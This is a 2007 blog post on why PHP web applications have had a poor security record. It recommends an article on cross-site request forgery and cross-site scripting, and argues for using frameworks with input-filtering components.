Sunday, March 25, 2007

Good Article on Web Application Security Vulnerabilities

The PHP programming language has historically gotten a bad rap in the area of security. While the language itself has had some vulnerabilities, three other aspects have (in my opinion) played a larger role:

  • PHP is an easy language to learn so there are a lot of unsophisticated beginners with no awareness of security holes writing web applications on it.

  • The rise of PHP coincided with a rise in community content applications (bulletin boards, blogs, Nukes) where external, untrusted users could insert their own content with potentially malicious payloads.

  • The PHP programming community was a little late in adopting web application frameworks. Good frameworks provide the plumbing for a web application and take care of security holes so that the custom code that developers write doesn't have to worry as much about known hacker exploits.

Two of these three factors are rapidly changing. The PHP development community is getting more sophisticated from a technology perspective and frameworks are getting better and are becoming more commonly used.

I am seeing more and more articles concerning security on PHP developer websites and magazines. For example, there is a really good article on the eZ publish site about Cross Site Request Forgery (CSRF) and Cross Site Scripting (XSS). It goes over how a hacker can inject malicious code into your site and how to protect yourself against these attacks. Here is a hint... never trust anything that a user enters. For more reading, check out Rob Miller's PHP Security Guide.

If you have been holding back on using a framework, I would reconsider. Most of the PHP frameworks have filter components (The Zend Framework has their Zend_Filter. eZ components has a User Input component) that disarms potentially hazardous user input. Tapping into the collective intelligence about security can free your own mind to building better, more effective web applications.